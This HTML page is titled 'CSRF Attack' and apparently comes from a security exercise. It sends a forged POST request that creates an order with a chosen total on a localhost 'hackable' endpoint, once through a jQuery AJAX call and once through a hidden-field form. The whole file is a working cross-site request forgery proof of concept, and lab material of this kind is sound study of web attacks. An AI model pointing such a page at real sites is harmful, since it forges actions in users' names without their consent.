<html>
<head>
    <title>CSRF Attack</title>
    <script type="text/javascript" src="libraries/jquery.min.js"></script>
    <script type="text/javascript" src="libraries/jquery.cookie.js"></script>
    <script>
function send() {
    $.ajax({
        type: "POST",
        url: "http://localhost/api/orders.php?action=hackable_create",
        data: {
            "total": "1.2",
            "products": {
                "1": 1
            }
        },
        datatype: "json"
    });
}
    </script>
</head>
<body>
    <input type="button" onclick="send()" value="Send AJAX request">
    </br>
    </br>
    <form method="POST" action="http://localhost/api/orders.php?action=hackable_create">
        <input type="hidden" name="total" value="1.2">
        <input type="hidden" name="products" value="1">
        <input type="submit" value="Send POST form">
    </form>
</body>
</html>
